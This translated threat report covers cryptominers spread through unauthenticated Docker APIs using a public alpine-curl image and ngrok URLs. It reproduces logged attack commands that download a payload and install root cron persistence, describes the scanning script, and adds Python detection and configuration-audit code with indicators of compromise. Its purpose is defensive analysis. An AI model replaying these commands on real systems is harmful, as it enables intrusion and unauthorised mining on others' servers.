How an unauthenticated Docker API and public community images are used to spread cryptocurrency miners


We analysed data collected with honeypot containers that we created to track threats, and found significant activity by unwanted or unauthorised cryptocurrency miners deployed as rogue containers using an image published on Docker Hub. The image is used as part of a service that delivers malicious cryptocurrency miners.

In addition, network tools are installed in order to break into neighbouring exposed containers and applications.

We leave our honeypots as they are, that is, with default settings, without any security measures or subsequent installation of additional software. Note that Docker publishes recommendations for the initial setup to avoid mistakes and simple vulnerabilities. But the honeypots used here are containers designed to detect attacks aimed at the container deployment platform, not at the applications inside the containers.

The malicious activity detected is also notable because it requires no vulnerability and is independent of the Docker version. Finding a misconfigured, and therefore exposed, container image is all the attackers need to infect many exposed servers.

An unsecured Docker API allows a user to perform a wide range of commands, including obtaining the list of running containers, retrieving the logs of a particular container, starting, stopping (including forced stopping) and even creating a new container from a particular image with specified settings.

Figure: On the left, the malware delivery method. On the right, the attacker's environment, which allows images to be pushed remotely.

Figure: Distribution by country of the 3762 exposed Docker APIs. Based on a Shodan search dated 12.02.2019.

Attack options and payload

The malicious activity was not detected with the honeypots alone. Shodan data show that the number of exposed Docker APIs (see the second figure) has risen since we investigated a misconfigured container used as a bridge for deploying Monero cryptocurrency mining software. In October of last year (2018; current data may look roughly like this. Translator's note) there were only 856 exposed APIs.

Examination of the honeypot logs showed that the use of the container image was linked to the use of ngrok. This allows the attackers to create dynamic URLs when delivering the payload to the exposed server. Below are code excerpts from the log that show the abuse of the ngrok service:

Tty: false
Command: "-c curl --retry 3 -m 60 -o /tmp9bedce/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d "hxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283";echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d" >/tmp9bedce/etc/crontab;echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d" >/tmp9bedce/etc/cron.d/1m;chroot /tmp9bedce sh -c "cron || crond"",
Entrypoint: "/bin/sh"

Tty: false,
Command: "-c curl --retry 3 -m 60 -o /tmp570547/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d "hxxp://5249d5f6[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283";echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d" >/tmp570547/etc/crontab;echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d" >/tmp570547/etc/cron.d/1m;chroot /tmp570547 sh -c "cron || crond"",
Entrypoint: "/bin/sh"

Tty: false,
Command: "-c curl --retry 3 -m 60 -o /tmp326c80/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed "hxxp://b27562c1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee";echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed" >/tmp326c80/etc/crontab;echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed" >/tmp326c80/etc/cron.d/1m;chroot /tmp326c80 sh -c "cron || crond"",
Entrypoint: "/bin/sh",

Tty: false,
Cmd: "-c curl --retry 3 -m 60 -o /tmp8b9b5b/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed "hxxp://f30c8cf9[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee";echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed" >/tmp8b9b5b/etc/crontab;echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed" >/tmp8b9b5b/etc/cron.d/1m;chroot /tmp8b9b5b sh -c "cron || crond"",
Entrypoint: "/bin/sh"

As you can see, the dropped files are fetched from constantly changing URLs. These URLs have a short lifetime, so the payload can no longer be downloaded after they expire.
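A detection rule for container-create requests of the shape shown in the log excerpts above, added here as an example (it is not code from the original report): it scores a request's Cmd for the curl download from a rotating ngrok.io host, the per-minute root cron entries written under /etc/crontab and /etc/cron.d, and the chroot start of cron. The two sample requests, the defanged ngrok subdomain, the file hash and the directory name are constructed placeholders.

```python
import re

# Indicators taken from the honeypot entries quoted above: the container is
# created with Entrypoint /bin/sh, fetches a payload with curl from a rotating
# *.ngrok.io URL, writes a per-minute root cron job into /etc/crontab and
# /etc/cron.d, then chroots into a temporary directory to start cron.
INDICATORS = {
    "ngrok_download": re.compile(
        r"\bcurl\b.*?h(?:xx|tt)ps?://[a-z0-9]+(?:\[\.\]|\.)ngrok(?:\[\.\]|\.)io", re.I),
    "cron_persistence": re.compile(r">\s*(?:/\S*?)?/etc/(?:crontab|cron\.d)"),
    "every_minute_root_job": re.compile(r"\*( \*){4} root sh "),
    "chroot_exec": re.compile(r"\bchroot\s+/\S+\s+sh\s+-c"),
}

def matched_indicators(req):
    """Return the indicator names matched by one container-create request.
    `req` mirrors the fields in the log excerpts (Entrypoint, Cmd/Command, Tty).
    Cmd is accepted as the flattened string shown in the log or as the JSON
    array the Docker API actually takes.
    """
    cmd = req.get("Cmd") or req.get("Command") or ""
    if isinstance(cmd, list):
        cmd = " ".join(cmd)
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmd)]
    if hits and str(req.get("Entrypoint") or "").endswith("/sh"):
        hits.append("shell_entrypoint")
    return hits

def is_suspicious(req):
    """Require two independent indicators so that a lone curl or cron edit in a
    legitimate build step does not trip the rule."""
    return len(matched_indicators(req)) >= 2

# Constructed samples in the shape of the log entries: defanged URL, placeholder
# hash and directory (none of these are values from the page).
MALICIOUS = {
    "Tty": False,
    "Entrypoint": "/bin/sh",
    "Cmd": ["-c", 'curl --retry 3 -m 60 -o /tmpEXAMPLE/tmp/tmpfilePLACEHOLDER '
            '"hxxp://0000aaaa[.]ngrok[.]io/f/serve?l=d&r=PLACEHOLDER";'
            'echo "* * * * * root sh /tmp/tmpfilePLACEHOLDER" >/tmpEXAMPLE/etc/crontab;'
            'echo "* * * * * root sh /tmp/tmpfilePLACEHOLDER" >/tmpEXAMPLE/etc/cron.d/1m;'
            'chroot /tmpEXAMPLE sh -c "cron || crond"'],
}
BENIGN = {  # an ordinary health-check wrapper around nginx
    "Tty": False,
    "Entrypoint": "/bin/sh",
    "Cmd": ["-c", "curl -fsS http://localhost:8080/healthz && nginx -g 'daemon off;'"],
}
```

The rule is meant to run over the daemon's create-container requests (or the audit log of a proxy in front of the API), not over the processes inside a container, since the persistence lands on the host's cron.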

There are two payload options. The first is a compiled ELF miner for Linux (detected as Coinminer.SH.MALXMR.ATNO) that connects to a mining pool. The second is a script (TrojanSpy.SH.ZNETMAP.A) designed to fetch certain network tools used to scan network ranges and search for new targets.

The dropper script sets two variables, which are then used to deploy the cryptocurrency miner. The HOST variable holds the URL where the malicious files are hosted, and the RIP variable the file name (in fact, a hash) of the miner to be deployed. The HOST variable changes every time the hash variable changes. The script also tries to check that no other cryptocurrency miners are running on the attacked server.

Figure: Examples of the HOST and RIP variables, and the code excerpt used to check that no other miners are running.

Before the miner is started, it is renamed to nginx. Other versions of this script rename the miner to other legitimate services that may be present in Linux environments. This is usually enough to pass a check against the list of running processes.

The search script also has its peculiarities. It works with the same URL service to pull the tools it needs. Among them is the zmap binary, which is used to scan networks and obtain a list of open ports. The script also downloads another binary that is used to interact with the discovered services and receive banners from them, in order to get additional information about a discovered service (for example, its version).

The script also predefines certain network ranges to be scanned, although this depends on the version of the script. It also sets the target ports for the services, in this case Docker, before running the scan.

As soon as targets are found, banners are automatically fetched from them. The script also filters targets according to the services, applications, components or platforms of interest: Redis, Jenkins, Drupal, MODX, Kubernetes Master, Docker client 1.16 and Apache CouchDB. If a scanned server matches any of them, it is saved in a text file that the attackers can later use for analysis and exploitation. These text files are uploaded to the attackers' servers via dynamic links. That is, a separate URL is used for each file, which makes subsequent access difficult.

The attack vector is the Docker image, as can be seen in the following two code fragments.

Figure: At the top, the renaming to a legitimate service; at the bottom, how zmap is used to scan networks.

Figure: At the top, the predefined network ranges; at the bottom, the specific ports used to search for services, including Docker.

Figure: The screenshot shows that the alpine-curl image has been downloaded more than 10 million times.

A Docker image can be built on Alpine Linux and curl, an efficient CLI tool for transferring files over various protocols. As you can see in the previous figure, this image has already been downloaded more than 10 million times. The large number of downloads may indicate that this image is being used as an entry point: the image was last updated more than six months ago, and users have not downloaded the other images in this repository nearly as often. In Docker, the entry point is the set of instructions used to prepare a container for running. If the entry point settings are wrong (for example, the container is left exposed to the internet), the image can be used as an attack vector. Attackers can use it to deliver a payload if they find a misconfigured or exposed container that has been left unmaintained.

It is important to note that this image (alpine-curl) is not malicious in itself, but as shown above, it can be used to perform malicious actions. Similar Docker images can also be used to perform malicious actions. We contacted Docker and worked with them on this issue.

Recommendations

Misconfiguration remains a persistent problem for many companies, especially those practising DevOps, which is focused on rapid development and delivery. This is compounded by the need to comply with audit and monitoring requirements, the need to watch over the storage of confidential data, and the enormous damage of failing to do so. Building security automation into the development life cycle not only helps find security holes that would otherwise go unnoticed, but also helps reduce unnecessary work, such as running additional software builds for every vulnerability or misconfiguration found after an application has been deployed.

The incident discussed in this article highlights the need to consider security from the outset, including the following recommendations:

  • For system administrators and developers: always check your API settings to make sure everything is configured to accept requests only from a particular server or from the internal network.
  • Follow the principle of least privilege: make sure container images are signed and verified, restrict access to critical components (the container launch service) and add encryption to network connections.
  • Follow the recommendations and enable the security mechanisms, e.g. those from Docker and the built-in security features.
  • Use automated scanning of runtimes and images to get additional information about the processes running in the container (for example, to detect tampering or to search for vulnerabilities). Application control and integrity monitoring help track abnormal changes to servers, files and system areas.
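The first two recommendations, restricting which hosts the daemon API accepts requests from and encrypting the connection, can be checked mechanically in the daemon's configuration. The audit function below is an added example and not part of the original article; the two daemon.json documents are constructed, while the keys it reads (hosts, tlsverify, tlscacert, tlscert, tlskey) are Docker's own daemon.json settings.

```python
import json

# Constructed daemon.json documents (not from the article). The first exposes the
# API on every interface with no TLS, which is the configuration the scanners
# described above look for; the second keeps the Unix socket and adds only a
# TLS listener on an internal address with client-certificate verification.
WEAK = json.dumps({"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]})
HARDENED = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://10.0.0.5:2376"],
    "tlsverify": True,
    "tlscacert": "/etc/docker/ca.pem",
    "tlscert": "/etc/docker/server-cert.pem",
    "tlskey": "/etc/docker/server-key.pem",
})

LOOPBACK = ("127.", "localhost", "[::1]")
ANY_INTERFACE = ("0.0.0.0", "[::]")

def audit_daemon_config(text):
    """Return a list of findings for one daemon.json document (empty = clean)."""
    cfg = json.loads(text)
    findings = []
    tls_verify = bool(cfg.get("tlsverify"))
    for host in cfg.get("hosts", []):
        if not host.startswith("tcp://"):
            continue  # unix:// and fd:// listeners are not reachable over the network
        addr = host[len("tcp://"):]
        # Strip the port; an empty host part is treated conservatively as non-loopback.
        bind = addr.rsplit(":", 1)[0] if ":" in addr else addr
        if bind in ANY_INTERFACE:
            findings.append(f"{host}: API listens on all interfaces")
        if not bind.startswith(LOOPBACK) and not tls_verify:
            # "tls": true alone only encrypts; without tlsverify any client is accepted.
            findings.append(f"{host}: remote listener without tlsverify (unauthenticated API)")
    if tls_verify:
        for key in ("tlscacert", "tlscert", "tlskey"):
            if not cfg.get(key):
                findings.append(f"tlsverify is set but {key} is missing")
    return findings
```

Hosts passed to dockerd on the command line with -H are not covered; those would need to be collected from the service unit as well.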

Trend Micro helps DevOps teams build securely, ship quickly and launch anywhere. Trend Micro Hybrid Cloud Security provides powerful, streamlined and automated security across the organisation's DevOps pipeline and delivers multiple XGen threat defences to protect physical, virtual and cloud workloads at runtime. It also adds container security with Deep Security and Deep Security Smart Check, which scan Docker container images for malware and vulnerabilities at any point in the development pipeline to block threats before they are deployed.

Indicators of compromise

Related hashes:

  • 54343fd1555e1f72c2c1d30369013fb40372a88875930c71b8c3a23bbe5bb15e (Coinminer.SH.MALXMR.ATNO)
  • f1e53879e992771db6045b94b3f73d11396fbe7b3394103718435982a7161228 (TrojanSpy.SH.ZNETMAP.A)

In the Docker video course, practising speakers show which settings need to be made first to reduce the likelihood of, or to avoid entirely, the situation described above. And on 19-21 August, at the online intensive DevOps Tools & Cheats, you can discuss these and similar security problems with colleagues and practising instructors at a round table, where everyone can speak and hear about the pains and successes of experienced colleagues.

Source: www.habr.com
